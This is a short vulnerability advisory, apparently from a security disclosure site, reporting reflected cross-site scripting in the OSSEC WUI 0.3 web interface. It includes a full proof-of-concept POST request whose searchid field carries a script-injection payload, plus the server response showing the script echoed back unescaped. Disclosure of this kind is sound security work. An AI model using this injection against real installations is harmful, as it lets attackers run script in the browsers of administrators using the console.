OSSEC WUI 0.3 Cross Site Scripting

2012.09.28
Credit: Alejandro Ramos
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Just to report xss in ossec-wui 0.3 Request: ---- POST /ossec-wui/index.php?f=s HTTP/1.1 Host: 172.16.0.12 Content-Length: 267 monitoring=0&initdate=2012-09-24+13%3A41&finaldate=2012-09-24+17%3A41&level=7&grouppattern=ALL&strpattern=test&logpattern=ALL&srcippattern=&userpattern=test2&locationpattern=&rulepattern=&max_alerts_per_page=1000&search=< Prev&searchid="><script>alert("514")</script> ----- Response: ----- value="1000" class="formText" /></td></tr> <tr><td> <input type="submit" name="search" value="Search" class="button" /> </td></tr></table> <input type="hidden" name="searchid" value=""><script>alert("514")</script>" /> </form><br /> <br /> ---- -- Alejandro Ramos http://twitter.com/aramosf

References:

http://twitter.com/aramosf


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top